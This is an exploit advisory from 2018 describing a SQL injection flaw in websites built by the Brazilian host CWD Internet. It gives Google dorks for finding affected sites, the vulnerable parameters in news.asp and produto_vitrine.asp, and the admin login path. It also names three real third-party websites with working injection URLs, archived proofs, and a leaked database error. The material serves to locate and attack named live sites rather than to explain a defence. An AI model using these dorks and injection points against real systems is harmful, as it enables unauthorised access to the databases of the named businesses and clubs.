################################################################################################# # Exploit Title : Desenvolvido e Hospedado por CWD Internet Brazil SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 05/06/2018 # Vendor Homepage : cwd.com.br # Tested On : Windows / Kali Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 ################################################################################################# # Title : Copyright © CWD Internet 2012, Todos os direitos reservados - Uma empresa do Grupo Controlp.Com.Br Web Solution Systems # Google Dork 1 : intext:''Desenvolvido e Hospedado por CWD Internet'' # Google Dork 2 : inurl:''/news.asp?tipo=T&offset='' # Exploit : /news.asp?tipo=T&offset=[SQL Injection] # Exploit : /produto_vitrine.asp?fabricante=[SQL Injection] # Exploit : /produto_vitrine.asp?categoria=[SQL Injection] # Admin Login Path => /restrito.asp ################################################################################################# # Example Site => sanseicomercial.com.br/produto_vitrine.asp?categoria=53%27 => [ Proof of Concept ] => archive.is/T1Wwq # Example Site => rotaxmotoclube.org.br/news.asp?tipo=1%27 => [ Proof of Concept ] => archive.is/ijSQJ # Example Site => 7lobos.com.br/produto_vitrine.asp?fabricante=194%27 => [ Proof of Concept ] => archive.is/Odbkf # SQL-DB Error => Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'produtos.fabricante = fornecedor.cod and produtos.categoria = categoria.cod and produtos.categoria = 53' order by fornecedor.fabricante'. /produto_vitrine.asp, line 52 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################